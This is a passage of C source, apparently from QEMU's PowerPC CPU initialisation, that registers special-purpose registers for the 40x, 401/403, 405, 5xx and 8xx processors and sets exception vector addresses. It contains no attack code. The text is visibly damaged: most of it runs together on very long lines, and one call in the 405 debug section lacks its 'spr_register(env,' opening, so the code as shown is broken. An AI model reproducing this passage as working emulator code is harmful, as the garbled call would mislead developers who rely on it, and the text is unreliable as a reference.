                 &spr_read_generic, SPR_NOACCESS,
                 0x00000000);
    /* XXX : not implemented */
    spr_register(env, SPR_BOOKE_ICDBTRL, "ICDBTRL",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, SPR_NOACCESS,
                 0x00000000);
    /* XXX : not implemented */
    spr_register(env, SPR_440_DBDR, "DBDR",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, &spr_write_generic,
                 0x00000000);
    /* Processor control */
    spr_register(env, SPR_4xx_CCR0, "CCR0",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, &spr_write_generic,
                 0x00000000);
    spr_register(env, SPR_440_RSTCFG, "RSTCFG",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, SPR_NOACCESS,
                 0x00000000);
    /* Storage control */
    spr_register(env, SPR_440_MMUCR, "MMUCR",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, &spr_write_generic,
                 0x00000000);
}

/* SPR shared between PowerPC 40x implementations */
static void gen_spr_40x(CPUPPCState *env)
{
    /* Cache */
    /* not emulated, as QEMU does not emulate caches */
    spr_register(env, SPR_40x_DCCR, "DCCR",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, &spr_write_generic,
                 0x00000000);
    /* not emulated, as QEMU does not emulate caches */
    spr_register(env, SPR_40x_ICCR, "ICCR",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, &spr_write_generic,
                 0x00000000);
    /* not emulated, as QEMU does not emulate caches */
    spr_register(env, SPR_BOOKE_ICDBDR, "ICDBDR",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, SPR_NOACCESS,
                 0x00000000);
    /* Exception */
    spr_register(env, SPR_40x_DEAR, "DEAR",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, &spr_write_generic,
                 0x00000000);
    spr_register(env, SPR_40x_ESR, "ESR",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, &spr_write_generic,
                 0x00000000);
    spr_register(env, SPR_40x_EVPR, "EVPR",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, &spr_write_excp_prefix,
                 0x00000000);
    spr_register(env, SPR_40x_SRR2, "SRR2",
                 &spr_read_generic, &spr_write_generic,
                 &spr_read_generic, &spr_write_generic,
                 0x00000000);
    spr_register(env, SPR_40x_SRR3, "SRR3",
                 &spr_read_generic, &spr_write_generic,
                 &spr_read_generic, &spr_write_generic,
                 0x00000000);
    /* Timers */
    spr_register(env, SPR_40x_PIT, "PIT",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_40x_pit, &spr_write_40x_pit,
                 0x00000000);
    spr_register(env, SPR_40x_TCR, "TCR",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, &spr_write_booke_tcr,
                 0x00000000);
    spr_register(env, SPR_40x_TSR, "TSR",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, &spr_write_booke_tsr,
                 0x00000000);
}

/* SPR specific to PowerPC 405 implementation */
static void gen_spr_405(CPUPPCState *env)
{
    /* MMU */
    spr_register(env, SPR_40x_PID, "PID",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, &spr_write_generic,
                 0x00000000);
    spr_register(env, SPR_4xx_CCR0, "CCR0",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, &spr_write_generic,
                 0x00700000);
    /* Debug interface */
    /* XXX : not implemented */
    spr_register(env, SPR_40x_DBCR0, "DBCR0",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, &spr_write_40x_dbcr0,
                 0x00000000);
    /* XXX : not implemented */
SPR_405_DBCR1, "DBCR1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_40x_DBSR, "DBSR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_clear, /* Last reset was system reset */ 0x00000300); /* XXX : not implemented */ spr_register(env, SPR_40x_DAC1, "DAC1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_40x_DAC2, "DAC2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_405_DVC1, "DVC1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_405_DVC2, "DVC2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_40x_IAC1, "IAC1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_40x_IAC2, "IAC2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_405_IAC3, "IAC3", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_405_IAC4, "IAC4", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Storage control */ /* XXX: TODO: not implemented */ spr_register(env, SPR_405_SLER, "SLER", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_40x_sler, 0x00000000); spr_register(env, SPR_40x_ZPR, "ZPR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_405_SU0R, "SU0R", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* SPRG */ spr_register(env, SPR_USPRG0, "USPRG0", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); spr_register(env, SPR_SPRG4, "SPRG4", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_SPRG5, "SPRG5", SPR_NOACCESS, SPR_NOACCESS, spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_SPRG6, "SPRG6", SPR_NOACCESS, SPR_NOACCESS, spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_SPRG7, "SPRG7", SPR_NOACCESS, SPR_NOACCESS, spr_read_generic, &spr_write_generic, 0x00000000); gen_spr_usprgh(env); } /* SPR shared between PowerPC 401 & 403 implementations */ static void gen_spr_401_403(CPUPPCState *env) { /* Time base */ spr_register(env, SPR_403_VTBL, "TBL", &spr_read_tbl, SPR_NOACCESS, &spr_read_tbl, SPR_NOACCESS, 0x00000000); spr_register(env, SPR_403_TBL, "TBL", SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, &spr_write_tbl, 0x00000000); spr_register(env, SPR_403_VTBU, "TBU", &spr_read_tbu, SPR_NOACCESS, &spr_read_tbu, SPR_NOACCESS, 0x00000000); spr_register(env, SPR_403_TBU, "TBU", SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, &spr_write_tbu, 0x00000000); /* Debug */ /* not emulated, as QEMU do not emulate caches */ spr_register(env, SPR_403_CDBCR, "CDBCR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); } /* SPR specific to PowerPC 401 implementation */ static void gen_spr_401(CPUPPCState *env) { /* Debug interface */ /* XXX : not implemented */ spr_register(env, SPR_40x_DBCR0, "DBCR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_40x_dbcr0, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_40x_DBSR, "DBSR", 
SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_clear, /* Last reset was system reset */ 0x00000300); /* XXX : not implemented */ spr_register(env, SPR_40x_DAC1, "DAC", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_40x_IAC1, "IAC", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Storage control */ /* XXX: TODO: not implemented */ spr_register(env, SPR_405_SLER, "SLER", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_40x_sler, 0x00000000); /* not emulated, as QEMU never does speculative access */ spr_register(env, SPR_40x_SGR, "SGR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0xFFFFFFFF); /* not emulated, as QEMU do not emulate caches */ spr_register(env, SPR_40x_DCWR, "DCWR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); } static void gen_spr_401x2(CPUPPCState *env) { gen_spr_401(env); spr_register(env, SPR_40x_PID, "PID", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_40x_ZPR, "ZPR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); } /* SPR specific to PowerPC 403 implementation */ static void gen_spr_403(CPUPPCState *env) { /* Debug interface */ /* XXX : not implemented */ spr_register(env, SPR_40x_DBCR0, "DBCR0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_40x_dbcr0, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_40x_DBSR, "DBSR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_clear, /* Last reset was system reset */ 0x00000300); /* XXX : not implemented */ spr_register(env, SPR_40x_DAC1, "DAC1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_40x_DAC2, "DAC2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_40x_IAC1, "IAC1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_40x_IAC2, "IAC2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); } static void gen_spr_403_real(CPUPPCState *env) { spr_register(env, SPR_403_PBL1, "PBL1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_403_pbr, &spr_write_403_pbr, 0x00000000); spr_register(env, SPR_403_PBU1, "PBU1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_403_pbr, &spr_write_403_pbr, 0x00000000); spr_register(env, SPR_403_PBL2, "PBL2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_403_pbr, &spr_write_403_pbr, 0x00000000); spr_register(env, SPR_403_PBU2, "PBU2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_403_pbr, &spr_write_403_pbr, 0x00000000); } static void gen_spr_403_mmu(CPUPPCState *env) { /* MMU */ spr_register(env, SPR_40x_PID, "PID", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_40x_ZPR, "ZPR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); } /* SPR specific to PowerPC compression coprocessor extension */ static void gen_spr_compress(CPUPPCState *env) { /* XXX : not implemented */ spr_register(env, SPR_401_SKR, "SKR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); } #if defined(TODO_USER_ONLY) static void gen_spr_5xx_8xx(CPUPPCState *env) { /* Exception processing */ spr_register_kvm(env, SPR_DSISR, "DSISR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, 
&spr_write_generic, KVM_REG_PPC_DSISR, 0x00000000); spr_register_kvm(env, SPR_DAR, "DAR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_DAR, 0x00000000); /* Timer */ spr_register(env, SPR_DECR, "DECR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_decr, &spr_write_decr, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_EIE, "EIE", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_EID, "EID", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_NRI, "NRI", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_CMPA, "CMPA", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_CMPB, "CMPB", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_CMPC, "CMPC", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_CMPD, "CMPD", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_ECR, "ECR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_DER, "DER", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_COUNTA, "COUNTA", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_COUNTB, "COUNTB", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_CMPE, "CMPE", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_CMPF, "CMPF", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_CMPG, "CMPG", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_CMPH, "CMPH", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_LCTRL1, "LCTRL1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_LCTRL2, "LCTRL2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_BAR, "BAR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_DPDR, "DPDR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_IMMR, "IMMR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); } static void gen_spr_5xx(CPUPPCState *env) { /* XXX : not implemented */ spr_register(env, SPR_RCPU_MI_GRA, "MI_GRA", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_RCPU_L2U_GRA, "L2U_GRA", 
SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_RPCU_BBCMCR, "L2U_BBCMCR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_RCPU_L2U_MCR, "L2U_MCR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_RCPU_MI_RBA0, "MI_RBA0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_RCPU_MI_RBA1, "MI_RBA1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_RCPU_MI_RBA2, "MI_RBA2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_RCPU_MI_RBA3, "MI_RBA3", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_RCPU_L2U_RBA0, "L2U_RBA0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_RCPU_L2U_RBA1, "L2U_RBA1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_RCPU_L2U_RBA2, "L2U_RBA2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_RCPU_L2U_RBA3, "L2U_RBA3", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_RCPU_MI_RA0, "MI_RA0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_RCPU_MI_RA1, "MI_RA1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_RCPU_MI_RA2, "MI_RA2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_RCPU_MI_RA3, "MI_RA3", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_RCPU_L2U_RA0, "L2U_RA0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_RCPU_L2U_RA1, "L2U_RA1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_RCPU_L2U_RA2, "L2U_RA2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_RCPU_L2U_RA3, "L2U_RA3", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_RCPU_FPECR, "FPECR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); } static void gen_spr_8xx(CPUPPCState *env) { /* XXX : not implemented */ spr_register(env, SPR_MPC_IC_CST, "IC_CST", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_IC_ADR, "IC_ADR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_IC_DAT, "IC_DAT", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ 
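/*
 * A note on the registration pattern used throughout this block, with a
 * minimal sketch (SPR_FOO is a placeholder, not a real SPR): the two
 * callback pairs passed to spr_register() are the user-mode (problem
 * state) read/write hooks followed by the supervisor-mode read/write
 * hooks, SPR_NOACCESS in a slot makes access at that privilege level
 * illegal, and the final argument is the register's reset value:
 *
 *     spr_register(env, SPR_FOO, "FOO",
 *                  SPR_NOACCESS, SPR_NOACCESS,              user: no access
 *                  &spr_read_generic, &spr_write_generic,   supervisor: R/W
 *                  0x00000000);                             reset value
 *
 * The "XXX : not implemented" markers mean the register is modelled as
 * plain supervisor-accessible storage with no side effects; the data
 * cache and MMU tablewalk registers below follow the same shape.
 */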
spr_register(env, SPR_MPC_DC_CST, "DC_CST", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_DC_ADR, "DC_ADR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_DC_DAT, "DC_DAT", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_MI_CTR, "MI_CTR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_MI_AP, "MI_AP", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_MI_EPN, "MI_EPN", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_MI_TWC, "MI_TWC", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_MI_RPN, "MI_RPN", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_MI_DBCAM, "MI_DBCAM", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_MI_DBRAM0, "MI_DBRAM0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_MI_DBRAM1, "MI_DBRAM1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_MD_CTR, "MD_CTR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_MD_CASID, "MD_CASID", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_MD_AP, "MD_AP", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_MD_EPN, "MD_EPN", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_MD_TWB, "MD_TWB", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_MD_TWC, "MD_TWC", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_MD_RPN, "MD_RPN", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_MD_TW, "MD_TW", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_MD_DBCAM, "MD_DBCAM", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_MD_DBRAM0, "MD_DBRAM0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_MD_DBRAM1, "MD_DBRAM1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); } #endif /* * AMR => SPR 29 (Power 2.04) * CTRL => SPR 136 (Power 2.04) * CTRL => SPR 152 (Power 2.04) * SCOMC => SPR 276 (64 bits ?) * SCOMD => SPR 277 (64 bits ?) 
* TBU40 => SPR 286 (Power 2.04 hypv) * HSPRG0 => SPR 304 (Power 2.04 hypv) * HSPRG1 => SPR 305 (Power 2.04 hypv) * HDSISR => SPR 306 (Power 2.04 hypv) * HDAR => SPR 307 (Power 2.04 hypv) * PURR => SPR 309 (Power 2.04 hypv) * HDEC => SPR 310 (Power 2.04 hypv) * HIOR => SPR 311 (hypv) * RMOR => SPR 312 (970) * HRMOR => SPR 313 (Power 2.04 hypv) * HSRR0 => SPR 314 (Power 2.04 hypv) * HSRR1 => SPR 315 (Power 2.04 hypv) * LPIDR => SPR 317 (970) * EPR => SPR 702 (Power 2.04 emb) * perf => 768-783 (Power 2.04) * perf => 784-799 (Power 2.04) * PPR => SPR 896 (Power 2.04) * DABRX => 1015 (Power 2.04 hypv) * FPECR => SPR 1022 (?) * ... and more (thermal management, performance counters, ...) */ /*****************************************************************************/ /* Exception vectors models */ static void init_excp_4xx_real(CPUPPCState *env) { env->excp_vectors[POWERPC_EXCP_CRITICAL] = 0x00000100; env->excp_vectors[POWERPC_EXCP_MCHECK] = 0x00000200; env->excp_vectors[POWERPC_EXCP_EXTERNAL] = 0x00000500; env->excp_vectors[POWERPC_EXCP_ALIGN] = 0x00000600; env->excp_vectors[POWERPC_EXCP_PROGRAM] = 0x00000700; env->excp_vectors[POWERPC_EXCP_SYSCALL] = 0x00000C00; env->excp_vectors[POWERPC_EXCP_PIT] = 0x00001000; env->excp_vectors[POWERPC_EXCP_FIT] = 0x00001010; env->excp_vectors[POWERPC_EXCP_WDT] = 0x00001020; env->excp_vectors[POWERPC_EXCP_DEBUG] = 0x00002000; env->ivor_mask = 0x0000FFF0UL; env->ivpr_mask = 0xFFFF0000UL; /* Hardware reset vector */ env->hreset_vector = 0xFFFFFFFCUL; } static void init_excp_4xx_softmmu(CPUPPCState *env) { env->excp_vectors[POWERPC_EXCP_CRITICAL] = 0x00000100; env->excp_vectors[POWERPC_EXCP_MCHECK] = 0x00000200; env->excp_vectors[POWERPC_EXCP_DSI] = 0x00000300; env->excp_vectors[POWERPC_EXCP_ISI] = 0x00000400; env->excp_vectors[POWERPC_EXCP_EXTERNAL] = 0x00000500; env->excp_vectors[POWERPC_EXCP_ALIGN] = 0x00000600; env->excp_vectors[POWERPC_EXCP_PROGRAM] = 0x00000700; env->excp_vectors[POWERPC_EXCP_SYSCALL] = 0x00000C00; env->excp_vectors[POWERPC_EXCP_PIT] = 0x00001000; env->excp_vectors[POWERPC_EXCP_FIT] = 0x00001010; env->excp_vectors[POWERPC_EXCP_WDT] = 0x00001020; env->excp_vectors[POWERPC_EXCP_DTLB] = 0x00001100; env->excp_vectors[POWERPC_EXCP_ITLB] = 0x00001200; env->excp_vectors[POWERPC_EXCP_DEBUG] = 0x00002000; env->ivor_mask = 0x0000FFF0UL; env->ivpr_mask = 0xFFFF0000UL; /* Hardware reset vector */ env->hreset_vector = 0xFFFFFFFCUL; } #if defined(TODO_USER_ONLY) static void init_excp_MPC5xx(CPUPPCState *env) { env->excp_vectors[POWERPC_EXCP_RESET] = 0x00000100; env->excp_vectors[POWERPC_EXCP_MCHECK] = 0x00000200; env->excp_vectors[POWERPC_EXCP_EXTERNAL] = 0x00000500; env->excp_vectors[POWERPC_EXCP_ALIGN] = 0x00000600; env->excp_vectors[POWERPC_EXCP_PROGRAM] = 0x00000700; env->excp_vectors[POWERPC_EXCP_FPU] = 0x00000900; env->excp_vectors[POWERPC_EXCP_DECR] = 0x00000900; env->excp_vectors[POWERPC_EXCP_SYSCALL] = 0x00000C00; env->excp_vectors[POWERPC_EXCP_TRACE] = 0x00000D00; env->excp_vectors[POWERPC_EXCP_FPA] = 0x00000E00; env->excp_vectors[POWERPC_EXCP_EMUL] = 0x00001000; env->excp_vectors[POWERPC_EXCP_DABR] = 0x00001C00; env->excp_vectors[POWERPC_EXCP_IABR] = 0x00001C00; env->excp_vectors[POWERPC_EXCP_MEXTBR] = 0x00001E00; env->excp_vectors[POWERPC_EXCP_NMEXTBR] = 0x00001F00; env->ivor_mask = 0x0000FFF0UL; env->ivpr_mask = 0xFFFF0000UL; /* Hardware reset vector */ env->hreset_vector = 0x00000100UL; } static void init_excp_MPC8xx(CPUPPCState *env) { env->excp_vectors[POWERPC_EXCP_RESET] = 0x00000100; env->excp_vectors[POWERPC_EXCP_MCHECK] = 
